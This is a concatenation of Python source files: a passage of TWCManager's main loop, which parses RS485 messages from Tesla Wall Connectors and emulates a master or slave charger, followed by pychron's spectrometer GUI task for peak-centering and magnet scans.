master.retryVINQuery() ######################################################################## # See if there's an incoming message on the input interface. timeMsgRxStart = time.time() while True: now = time.time() dataLen = master.getModuleByName("RS485").getBufferLen() if dataLen == 0: if msgLen == 0: # No message data waiting and we haven't received the # start of a new message yet. Break out of inner while # to continue at top of outer while loop where we may # decide to send a periodic message. break else: # No message data waiting but we've received a partial # message that we should wait to finish receiving. if now - timeMsgRxStart >= 2.0: debugLog( 9, "Msg timeout (" + hex_str(ignoredData) + ") " + hex_str(msg[0:msgLen]), ) msgLen = 0 ignoredData = bytearray() break time.sleep(0.025) continue else: dataLen = 1 data = master.getModuleByName("RS485").read(dataLen) if dataLen != 1: # This should never happen debugLog(1, "WARNING: No data available.") break timeMsgRxStart = now timeLastRx = now if msgLen == 0 and data[0] != 0xC0: # We expect to find these non-c0 bytes between messages, so # we don't print any warning at standard debug levels. debugLog(11, "Ignoring byte %02X between messages." % (data[0])) ignoredData += data continue elif msgLen > 0 and msgLen < 15 and data[0] == 0xC0: # If you see this when the program is first started, it # means we started listening in the middle of the TWC # sending a message so we didn't see the whole message and # must discard it. That's unavoidable. # If you see this any other time, it means there was some # corruption in what we received. It's normal for that to # happen every once in awhile but there may be a problem # such as incorrect termination or bias resistors on the # rs485 wiring if you see it frequently. debugLog( 10, "Found end of message before full-length message received. " "Discard and wait for new message.", ) msg = data msgLen = 1 continue if msgLen == 0: msg = bytearray() msg += data msgLen += 1 # Messages are usually 17 bytes or longer and end with \xc0\xfe. # However, when the network lacks termination and bias # resistors, the last byte (\xfe) may be corrupted or even # missing, and you may receive additional garbage bytes between # messages. # # TWCs seem to account for corruption at the end and between # messages by simply ignoring anything after the final \xc0 in a # message, so we use the same tactic. If c0 happens to be within # the corrupt noise between messages, we ignore it by starting a # new message whenever we see a c0 before 15 or more bytes are # received. # # Uncorrupted messages can be over 17 bytes long when special # values are "escaped" as two bytes. See notes in sendMsg. # # To prevent most noise between messages, add a 120ohm # "termination" resistor in parallel to the D+ and D- lines. # Also add a 680ohm "bias" resistor between the D+ line and +5V # and a second 680ohm "bias" resistor between the D- line and # ground. See here for more information: # https://www.ni.com/support/serial/resinfo.htm # http://www.ti.com/lit/an/slyt514/slyt514.pdf # This explains what happens without "termination" resistors: # https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly if msgLen >= 16 and data[0] == 0xC0: break if msgLen >= 16: msg = unescape_msg(msg, msgLen) # Set msgLen = 0 at start so we don't have to do it on errors below. # len($msg) now contains the unescaped message length. msgLen = 0 msgRxCount += 1 # When the sendTWCMsg web command is used to send a message to the # TWC, it sets lastTWCResponseMsg = b''. When we see that here, # set lastTWCResponseMsg to any unusual message received in response # to the sent message. Never set lastTWCResponseMsg to a commonly # repeated message like master or slave linkready, heartbeat, or # voltage/kWh report. if ( master.lastTWCResponseMsg == b"" and msg[0:2] != b"\xFB\xE0" and msg[0:2] != b"\xFD\xE0" and msg[0:2] != b"\xFC\xE1" and msg[0:2] != b"\xFB\xE2" and msg[0:2] != b"\xFD\xE2" and msg[0:2] != b"\xFB\xEB" and msg[0:2] != b"\xFD\xEB" and msg[0:2] != b"\xFD\xE0" ): master.lastTWCResponseMsg = msg debugLog(9, "Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "") ignoredData = bytearray() # After unescaping special values and removing the leading and # trailing C0 bytes, the messages we know about are always 14 bytes # long in original TWCs, or 16 bytes in newer TWCs (protocolVersion # == 2). if len(msg) != 14 and len(msg) != 16 and len(msg) != 20: debugLog( 1, "ERROR: Ignoring message of unexpected length %d: %s" % (len(msg), hex_str(msg)), ) continue checksumExpected = msg[len(msg) - 1] checksum = 0 for i in range(1, len(msg) - 1): checksum += msg[i] if (checksum & 0xFF) != checksumExpected: debugLog( 1, "ERROR: Checksum %X does not match %02X. Ignoring message: %s" % (checksum, checksumExpected, hex_str(msg)), ) continue if config["config"]["fakeMaster"] == 1: ############################ # Pretend to be a master TWC foundMsgMatch = False # We end each regex message search below with \Z instead of $ # because $ will match a newline at the end of the string or the # end of the string (even without the re.MULTILINE option), and # sometimes our strings do end with a newline character that is # actually the CRC byte with a value of 0A or 0D. msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL) if msgMatch and foundMsgMatch == False: # Handle acknowledgement of Start command foundMsgMatch = True senderID = msgMatch.group(1) msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL) if msgMatch and foundMsgMatch == False: # Handle acknowledgement of Stop command foundMsgMatch = True senderID = msgMatch.group(1) msgMatch = re.search( b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle linkready message from slave. # # We expect to see one of these before we start sending our # own heartbeat message to slave. # Once we start sending our heartbeat to slave once per # second, it should no longer send these linkready messages. # If slave doesn't hear master's heartbeat for around 10 # seconds, it sends linkready once per 10 seconds and starts # flashing its red LED 4 times with the top green light on. # Red LED stops flashing if we start sending heartbeat # again. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100 debugLog( 1, "%.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % (maxAmps, senderID[0], senderID[1], hex_str(sign)), ) if maxAmps >= 80: # U.S. chargers need a spike to 21A to cancel a 6A # charging limit imposed in an Oct 2017 Tesla car # firmware update. See notes where # spikeAmpsToCancel6ALimit is used. master.setSpikeAmps(21) else: # EU chargers need a spike to only 16A. This value # comes from a forum post and has not been directly # tested. master.setSpikeAmps(16) if senderID == fakeTWCID: debugLog( 1, "Slave TWC %02X%02X reports same TWCID as master. " "Slave should resolve by changing its TWCID." % (senderID[0], senderID[1]), ) # I tested sending a linkready to a real master with the # same TWCID as master and instead of master sending back # its heartbeat message, it sent 5 copies of its # linkready1 and linkready2 messages. Those messages # will prompt a real slave to pick a new random value # for its TWCID. # # We mimic that behavior by setting numInitMsgsToSend = # 10 to make the idle code at the top of the for() # loop send 5 copies of linkready1 and linkready2. numInitMsgsToSend = 10 continue # We should always get this linkready message at least once # and generally no more than once, so this is a good # opportunity to add the slave to our known pool of slave # devices. slaveTWC = master.newSlave(senderID, maxAmps) if ( slaveTWC.protocolVersion == 1 and slaveTWC.minAmpsTWCSupports == 6 ): if len(msg) == 14: slaveTWC.protocolVersion = 1 slaveTWC.minAmpsTWCSupports = 5 elif len(msg) == 16: slaveTWC.protocolVersion = 2 slaveTWC.minAmpsTWCSupports = 6 debugLog( 1, "Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d." % ( senderID[0], senderID[1], slaveTWC.protocolVersion, slaveTWC.minAmpsTWCSupports, ), ) # We expect maxAmps to be 80 on U.S. chargers and 32 on EU # chargers. Either way, don't allow # slaveTWC.wiringMaxAmps to be greater than maxAmps. if slaveTWC.wiringMaxAmps > maxAmps: debugLog( 1, "\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to " + str(config["config"]["wiringMaxAmpsPerTWC"]) + " which is greater than the max " + str(maxAmps) + " amps your charger says it can handle. " "Please review instructions in the source code and consult an " "electrician if you don't know what to do.", ) slaveTWC.wiringMaxAmps = maxAmps / 4 # Make sure we print one SHB message after a slave # linkready message is received by clearing # lastHeartbeatDebugOutput. This helps with debugging # cases where I can't tell if we responded with a # heartbeat or not. slaveTWC.lastHeartbeatDebugOutput = "" slaveTWC.timeLastRx = time.time() slaveTWC.send_master_heartbeat() else: msgMatch = re.search( b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle heartbeat message from slave. # # These messages come in as a direct response to each # heartbeat message from master. Slave does not send its # heartbeat until it gets one from master first. # A real master sends heartbeat to a slave around once per # second, so we do the same near the top of this for() # loop. Thus, we should receive a heartbeat reply from the # slave around once per second as well. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) heartbeatData = msgMatch.group(3) try: slaveTWC = master.getSlaveByID(senderID) except KeyError: # Normally, a slave only sends us a heartbeat message if # we send them ours first, so it's not expected we would # hear heartbeat from a slave that's not in our list. debugLog( 1, "ERROR: Received heartbeat message from " "slave %02X%02X that we've not met before." % (senderID[0], senderID[1]), ) continue if fakeTWCID == receiverID: slaveTWC.receive_slave_heartbeat(heartbeatData) else: # I've tried different fakeTWCID values to verify a # slave will send our fakeTWCID back to us as # receiverID. However, I once saw it send receiverID = # 0000. # I'm not sure why it sent 0000 and it only happened # once so far, so it could have been corruption in the # data or an unusual case. debugLog( 1, "WARNING: Slave TWC %02X%02X status data: " "%s sent to unknown TWC %02X%02X." % ( senderID[0], senderID[1], hex_str(heartbeatData), receiverID[0], receiverID[1], ), ) else: msgMatch = re.search( b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle kWh total and voltage message from slave. # # This message can only be generated by TWCs running newer # firmware. I believe it's only sent as a response to a # message from Master in this format: # FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00 # According to FuzzyLogic, this message has the following # format on an EU (3-phase) TWC: # FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00 # 00000038 (56) is the total kWh delivered to cars # by this TWC since its construction. # 00E6 (230) is voltage on phase A # 00F1 (241) is voltage on phase B # 00E8 (232) is voltage on phase C # # I'm guessing in world regions with two-phase power that # this message would be four bytes shorter, but the pattern # above will match a message of any length that starts with # FD EB. foundMsgMatch = True senderID = msgMatch.group(1) lifetimekWh = msgMatch.group(2) kWh = ( (lifetimekWh[0] << 24) + (lifetimekWh[1] << 16) + (lifetimekWh[2] << 8) + lifetimekWh[3] ) vPhaseA = msgMatch.group(3) voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1] vPhaseB = msgMatch.group(4) voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1] vPhaseC = msgMatch.group(5) voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1] data = msgMatch.group(6) for module in master.getModulesByType("Logging"): module["ref"].slaveStatus( { "TWCID": senderID, "kWh": kWh, "voltsPerPhase": [ voltsPhaseA, voltsPhaseB, voltsPhaseC, ], } ) # Update the timestamp of the last reciept of this message master.lastkWhMessage = time.time() # Every time we get this message, we re-queue the query master.queue_background_task({"cmd": "getLifetimekWh"}) # Update this detail for the Slave TWC master.updateSlaveLifetime( senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC ) else: msgMatch = re.search( b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Get 7 characters of VIN from slave. (XE is first 7, XF second 7) # # This message can only be generated by TWCs running newer # firmware. I believe it's only sent as a response to a # message from Master in this format: # FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00 # Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code # representing a letter or number. VV will be all zero when car CAN communication is disabled # (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter. foundMsgMatch = True vinPart = msgMatch.group(1) senderID = msgMatch.group(2) data = msgMatch.group(3) debugLog( 6, "Slave TWC %02X%02X reported VIN data: %s." % (senderID[0], senderID[1], hex_str(data)), ) slaveTWC = master.getSlaveByID(senderID) if vinPart == b"\xee": vinPart = 0 if vinPart == b"\xef": vinPart = 1 if vinPart == b"\xf1": vinPart = 2 slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00") if vinPart < 2: vinPart += 1 master.getVehicleVIN(senderID, vinPart) master.queue_background_task( { "cmd": "getVehicleVIN", "slaveTWC": senderID, "vinPart": str(vinPart), } ) else: slaveTWC.currentVIN = "".join(slaveTWC.VINData) # Clear VIN retry timer slaveTWC.lastVINQuery = 0 slaveTWC.vinQueryAttempt = 0 # Record this vehicle being connected master.recordVehicleVIN(slaveTWC) # Send VIN data to Status modules master.updateVINStatus() vinPart += 1 debugLog( 6, "Current VIN string is: %s at part %d." % (str(slaveTWC.VINData), vinPart), ) else: msgMatch = re.search( b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: foundMsgMatch = True debugLog( 1, "ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. " "Search installation instruction PDF for 'rotary switch' and set " "switch so its arrow points to F on the dial.", ) if foundMsgMatch == False: debugLog( 1, "*** UNKNOWN MESSAGE FROM SLAVE:" + hex_str(msg) + "\nPlease private message user CDragon at http://teslamotorsclub.com " "with a copy of this error.", ) else: ########################### # Pretend to be a slave TWC foundMsgMatch = False msgMatch = re.search( b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle linkready1 from master. # See notes in send_master_linkready1() for details. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) master.setMasterTWCID(senderID) # This message seems to always contain seven 00 bytes in its # data area. If we ever get this message with non-00 data # we'll print it as an unexpected message. debugLog( 1, "Master TWC %02X%02X Linkready1. Sign: %s" % (senderID[0], senderID[1], hex_str(sign)), ) if senderID == fakeTWCID: master.master_id_conflict() # Other than picking a new fakeTWCID if ours conflicts with # master, it doesn't seem that a real slave will make any # sort of direct response when sent a master's linkready1 or # linkready2. else: msgMatch = re.search( b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle linkready2 from master. # See notes in send_master_linkready2() for details. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) master.setMasterTWCID(senderID) # This message seems to always contain seven 00 bytes in its # data area. If we ever get this message with non-00 data # we'll print it as an unexpected message. debugLog( 1, "Master TWC %02X%02X Linkready2. Sign: %s" % (senderID[0], senderID[1], hex_str(sign)), ) if senderID == fakeTWCID: master.master_id_conflict() else: msgMatch = re.search( b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle heartbeat message from Master. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) heartbeatData = msgMatch.group(3) master.setMasterTWCID(senderID) try: slaveTWC = master.slaveTWCs[receiverID] except KeyError: slaveTWC = master.newSlave(receiverID, 80) slaveTWC.masterHeartbeatData = heartbeatData if receiverID != fakeTWCID: # This message was intended for another slave. # Ignore it. debugLog( 11, "Master %02X%02X sent " "heartbeat message %s to receiver %02X%02X " "that isn't our fake slave." % ( senderID[0], senderID[1], hex_str(heartbeatData), receiverID[0], receiverID[1], ), ) continue amps = ( master.slaveHeartbeatData[1] << 8 ) + master.slaveHeartbeatData[2] master.addkWhDelivered( (master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60) * (now - timeLastkWhDelivered) ) timeLastkWhDelivered = now if time.time() - timeLastkWhSaved >= 300.0: timeLastkWhSaved = now debugLog( 9, "Fake slave has delivered %.3fkWh" % (master.getkWhDelivered()), ) # Save settings to file master.queue_background_task({"cmd": "saveSettings"}) if heartbeatData[0] == 0x07: # Lower amps in use (not amps allowed) by 2 for 10 # seconds. Set state to 07. master.slaveHeartbeatData[0] = heartbeatData[0] timeToRaise2A = now + 10 amps -= 280 master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF master.slaveHeartbeatData[4] = amps & 0xFF elif heartbeatData[0] == 0x06: # Raise amp setpoint by 2 permanently and reply with # state 06. After 44 seconds, report state 0A. timeTo0Aafter06 = now + 44 master.slaveHeartbeatData[0] = heartbeatData[0] amps += 200 master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF master.slaveHeartbeatData[2] = amps & 0xFF amps -= 80 master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF master.slaveHeartbeatData[4] = amps & 0xFF elif ( heartbeatData[0] == 0x05 or heartbeatData[0] == 0x08 or heartbeatData[0] == 0x09 ): if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0: # A real slave mimics master's status bytes [1]-[2] # representing max charger power even if the master # sends it a crazy value. master.slaveHeartbeatData[1] = heartbeatData[1] master.slaveHeartbeatData[2] = heartbeatData[2] ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2] ampsUsed -= 80 master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF master.slaveHeartbeatData[4] = ampsUsed & 0xFF elif heartbeatData[0] == 0: if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now: timeTo0Aafter06 = 0 master.slaveHeartbeatData[0] = 0x0A elif timeToRaise2A > 0 and timeToRaise2A < now: # Real slave raises amps used by 2 exactly 10 # seconds after being sent into state 07. It raises # a bit slowly and sets its state to 0A 13 seconds # after state 07. We aren't exactly emulating that # timing here but hopefully close enough. timeToRaise2A = 0 amps -= 80 master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF master.slaveHeartbeatData[4] = amps & 0xFF master.slaveHeartbeatData[0] = 0x0A elif heartbeatData[0] == 0x02: debugLog( 1, "Master heartbeat contains error %ld: %s" % (heartbeatData[1], hex_str(heartbeatData)), ) else: debugLog(1, "UNKNOWN MHB state %s" % (hex_str(heartbeatData))) # Slaves always respond to master's heartbeat by sending # theirs back. slaveTWC.send_slave_heartbeat(senderID) slaveTWC.print_status(master.slaveHeartbeatData) else: msgMatch = re.search( b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle 2-hour idle message # # This message is sent from a Master TWC three times in a # row every 2 hours: # c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0 # # I'd say this is used to indicate the master is still # alive, but it doesn't contain the Master's TWCID or any other # data so I don't see what any receiving TWC can do with it. # # I suspect this message is only sent when the master # doesn't see any other TWCs on the network, so I don't # bother to have our fake master send these messages being # as there's no point in playing a fake master with no # slaves around. foundMsgMatch = True debugLog(1, "Received 2-hour idle message from Master.") else: msgMatch = re.search( b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle linkready message from slave on network that # presumably isn't us. foundMsgMatch = True senderID = msgMatch.group(1) sign = msgMatch.group(2) maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100 debugLog( 1, "%.2f amp slave TWC %02X%02X is ready to link. Sign: %s" % (maxAmps, senderID[0], senderID[1], hex_str(sign)), ) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received slave heartbeat message from " "slave %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue master.newSlave(senderID, maxAmps) else: msgMatch = re.search( b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle heartbeat message from slave on network that # presumably isn't us. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) heartbeatData = msgMatch.group(3) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received slave heartbeat message from " "slave %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue try: slaveTWC = master.slaveTWCs[senderID] except KeyError: # Slave is unlikely to send another linkready since it's # already linked with a real Master TWC, so just assume # it's 80A. slaveTWC = master.newSlave(senderID, 80) slaveTWC.print_status(heartbeatData) else: msgMatch = re.search( b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z", msg, re.DOTALL, ) if msgMatch and foundMsgMatch == False: # Handle voltage request message. This is only supported in # Protocol 2 so we always reply with a 16-byte message. foundMsgMatch = True senderID = msgMatch.group(1) receiverID = msgMatch.group(2) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received voltage request message from " "TWC %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue debugLog( 8, "VRQ from %02X%02X to %02X%02X" % (senderID[0], senderID[1], receiverID[0], receiverID[1]), ) if receiverID == fakeTWCID: kWhCounter = int(master.getkWhDelivered()) kWhPacked = bytearray( [ ((kWhCounter >> 24) & 0xFF), ((kWhCounter >> 16) & 0xFF), ((kWhCounter >> 8) & 0xFF), (kWhCounter & 0xFF), ] ) debugLog( 1, "VRS %02X%02X: %dkWh (%s) %dV %dV %dV" % ( fakeTWCID[0], fakeTWCID[1], kWhCounter, hex_str(kWhPacked), 240, 0, 0, ), ) master.getModuleByName("RS485").send( bytearray(b"\xFD\xEB") + fakeTWCID + kWhPacked + bytearray(b"\x00\xF0\x00\x00\x00\x00\x00") ) else: msgMatch = re.search( b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL ) if msgMatch and foundMsgMatch == False: # Handle voltage response message. # Example US value: # FD EB 7777 00000014 00F6 0000 0000 00 # EU value (3 phase power): # FD EB 7777 00000038 00E6 00F1 00E8 00 foundMsgMatch = True senderID = msgMatch.group(1) data = msgMatch.group(2) kWhCounter = ( (data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3] ) voltsPhaseA = (data[4] << 8) + data[5] voltsPhaseB = (data[6] << 8) + data[7] voltsPhaseC = (data[8] << 8) + data[9] # Update this detail for the Slave TWC master.updateSlaveLifetime( senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC ) if senderID == fakeTWCID: debugLog( 1, "ERROR: Received voltage response message from " "TWC %02X%02X that has the same TWCID as our fake slave." % (senderID[0], senderID[1]), ) continue debugLog( 1, "VRS %02X%02X: %dkWh %dV %dV %dV" % ( senderID[0], senderID[1], kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC, ), ) if foundMsgMatch == False: debugLog(1, "***UNKNOWN MESSAGE from master: " + hex_str(msg)) except KeyboardInterrupt: debugLog(1, "Exiting after background tasks complete...") break except Exception as e: # Print info about unhandled exceptions, then continue. Search for # 'Traceback' to find these in the log. traceback.print_exc() debugLog(1, "Unhandled Exception:" + traceback.format_exc()) # Sleep 5 seconds so the user might see the error. time.sleep(5) # Make sure any volatile data is written to disk before exiting master.queue_background_task({"cmd": "saveSettings"}) # Wait for background tasks thread to finish all tasks. # Note that there is no such thing as backgroundTasksThread.stop(). Because we # set the thread type to daemon, it will be automatically killed when we exit # this program. master.backgroundTasksQueue.join() # Close the input module master.getModuleByName("RS485").close() # # End main program # ##############################
spectrometer_task.py
# =============================================================================== # Copyright 2013 Jake Ross # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # ============= enthought library imports ======================= from __future__ import absolute_import import time # ============= standard library imports ======================== from threading import Thread from pyface.tasks.action.schema import SToolBar from pyface.tasks.task_layout import TaskLayout, PaneItem, Splitter, VSplitter from pyface.ui.qt4.tasks.advanced_editor_area_pane import EditorWidget from traits.api import Any, Instance, on_trait_change # ============= local library imports ========================== from pychron.core.ui.gui import invoke_in_main_thread from pychron.envisage.tasks.editor_task import EditorTask from pychron.spectrometer.tasks.editor import PeakCenterEditor, ScanEditor, CoincidenceEditor, ScannerEditor from pychron.spectrometer.tasks.spectrometer_actions import StopScanAction from pychron.spectrometer.tasks.spectrometer_panes import ControlsPane, \ ReadoutPane, IntensitiesPane, RecordControlsPane, DACScannerPane, MassScannerPane class SpectrometerTask(EditorTask): scan_manager = Any name = 'Spectrometer' id = 'pychron.spectrometer' _scan_editor = Instance(ScanEditor) tool_bars = [SToolBar(StopScanAction(), )] def info(self, msg, *args, **kw): super(SpectrometerTask, self).info(msg) def spy_position_magnet(self, *args, **kw): self.scan_manager.position_magnet(*args, **kw) def spy_peak_center(self, name): peak_kw = dict(confirm_save=False, warn=True, new_thread=False, message='spectrometer script peakcenter', on_end=self._on_peak_center_end) setup_kw = dict(config_name=name) return self._peak_center(setup_kw=setup_kw, peak_kw=peak_kw) def populate_mftable(self): sm = self.scan_manager cfg = sm.setup_populate_mftable() if cfg: def func(): refiso = cfg.isotope ion = sm.ion_optics_manager ion.backup_mftable() odefl = [] dets = cfg.get_detectors() self.debug('setting deflections') for det, defl in dets: odefl.append((det, sm.spectrometer.get_deflection(det))) sm.spectrometer.set_deflection(det, defl) for di in dets: ion.setup_peak_center(detector=[di.name], isotope=refiso, config_name=cfg.peak_center_config.active_item.name, standalone_graph=False, new=True, show_label=True, use_configuration_dac=False) ion.peak_center.update_others = False name = 'Pop MFTable {}-{}'.format(di.name, refiso) invoke_in_main_thread(self._open_editor, PeakCenterEditor(model=ion.peak_center, name=name)) self._on_peak_center_start() ion.do_peak_center(new_thread=False, save=True, warn=True) self._on_peak_center_end() if not ion.peak_center.isAlive(): break self.debug('unset deflections') for det, defl in odefl: sm.spectrometer.set_deflection(det, defl) fp = cfg.get_finish_position() self.debug('move to end position={}'.format(fp)) if fp: iso, det = fp if iso and det: ion.position(iso, det) t = Thread(target=func) t.start() def stop_scan(self): self.debug('stop scan fired') editor = self.active_editor self.debug('active editor {}'.format(editor)) if editor: if isinstance(editor, (ScanEditor, PeakCenterEditor, CoincidenceEditor)): self.debug('editor stop') editor.stop() def do_coincidence(self): es = [int(e.name.split(' ')[-1]) for e in self.editor_area.editors if isinstance(e, CoincidenceEditor)] i = max(es) + 1 if es else 1 man = self.scan_manager.ion_optics_manager name = 'Coincidence {:02d}'.format(i) if man.setup_coincidence(): self._open_editor(CoincidenceEditor(model=man.coincidence, name=name)) man.do_coincidence_scan() def do_peak_center(self): peak_kw = dict(confirm_save=True, warn=True, message='manual peakcenter', on_end=self._on_peak_center_end) self._peak_center(peak_kw=peak_kw) def define_peak_center(self): from pychron.spectrometer.ion_optics.define_peak_center_view import DefinePeakCenterView man = self.scan_manager.ion_optics_manager spec = man.spectrometer dets = spec.detector_names isos = spec.isotopes dpc = DefinePeakCenterView(detectors=dets, isotopes=isos, detector=dets[0], isotope=isos[0]) info = dpc.edit_traits() if info.result: det = dpc.detector isotope = dpc.isotope dac = dpc.dac self.debug('manually setting mftable to {}:{}:{}'.format(det, isotope, dac)) message = 'manually define peak center {}:{}:{}'.format(det, isotope, dac) man.spectrometer.magnet.update_field_table(det, isotope, dac, message) def _on_peak_center_start(self): self.scan_manager.log_events_enabled = False self.scan_manager.scan_enabled = False def _on_peak_center_end(self): self.scan_manager.log_events_enabled = True self.scan_manager.scan_enabled = True def send_configuration(self): self.scan_manager.spectrometer.send_configuration() def prepare_destroy(self): for e in self.editor_area.editors: if hasattr(e, 'stop'): e.stop() self.scan_manager.prepare_destroy() super(SpectrometerTask, self).prepare_destroy() # def activated(self): # self.scan_manager.activate() # self._scan_factory() # super(SpectrometerTask, self).activated() def create_dock_panes(self): panes = [ ControlsPane(model=self.scan_manager), RecordControlsPane(model=self.scan_manager), MassScannerPane(model=self.scan_manager), DACScannerPane(model=self.scan_manager), ReadoutPane(model=self.scan_manager), IntensitiesPane(model=self.scan_manager)] panes = self._add_canvas_pane(panes) return panes # def _active_editor_changed(self, new): # if not new: # try: # self._scan_factory() # except AttributeError: # pass # private def _peak_center(self, setup_kw=None, peak_kw=None): if setup_kw is None: setup_kw = {} if peak_kw is None: peak_kw = {} es = [] for e in self.editor_area.editors: if isinstance(e, PeakCenterEditor): try: es.append(int(e.name.split(' ')[-1])) except ValueError: pass i = max(es) + 1 if es else 1 ret = -1 ion = self.scan_manager.ion_optics_manager self._peak_center_start_hook() time.sleep(2) name = 'Peak Center {:02d}'.format(i) if ion.setup_peak_center(new=True, **setup_kw): self._on_peak_center_start() invoke_in_main_thread(self._open_editor, PeakCenterEditor(model=ion.peak_center, name=name)) ion.do_peak_center(**peak_kw) ret = ion.peak_center_result self._peak_center_stop_hook() return ret def _peak_center_start_hook(self): pass def _peak_center_stop_hook(self): pass def _scan_factory(self): sim = self.scan_manager.spectrometer.simulation name = 'Scan (Simulation)' if sim else 'Scan' # self._open_editor(ScanEditor(model=self.scan_manager, name=name)) # print 'asdfas', self.editor_area.control # print [e for e in self.editor_area.control.children() if isinstance(e, EditorWidget)] # super(SpectrometerTask, self).activated() se = ScanEditor(model=self.scan_manager, name=name) self._open_editor(se) def _default_layout_default(self): return TaskLayout( left=Splitter( PaneItem('pychron.spectrometer.controls'), orientation='vertical'), right=VSplitter(PaneItem('pychron.spectrometer.intensities'), PaneItem('pychron.spectrometer.readout'))) # def create_central_pane(self): # g = ScanPane(model=self.scan_manager) # return g @on_trait_change('scan_manager:mass_scanner:new_scanner') def _handle_mass_scan_event(self): self._scan_event(self.scan_manager.mass_scanner) @on_trait_change('scan_manager:dac_scanner:new_scanner') def _handle_dac_scan_event(self): self._scan_event(self.scan_manager.dac_scanner) def _scan_event(self, scanner): sim = self.scan_manager.spectrometer.simulation name = 'Magnet Scan (Simulation)' if sim else 'Magnet Scan' editor = next((e for e in self.editor_area.editors if e.id == 'pychron.scanner'), None) if editor is not None: scanner.reset() else: editor = ScannerEditor(model=scanner, name=name, id='pychron.scanner') self._open_editor(editor, activate=False) self.split_editors(0, 1, h2=300, orientation='vertical') self.activate_editor(editor) @on_trait_change('window:opened') def _opened(self): self.scan_manager.activate() self._scan_factory() ee = [e for e in self.editor_area.control.children() if isinstance(e, EditorWidget)][0] # print int(ee.features()) # ee.setFeatures(QtGui.QDockWidget.NoDockWidgetFeatures) # print int(ee.features()) # ee.update_title() # ============= EOF =============================================
clock.py
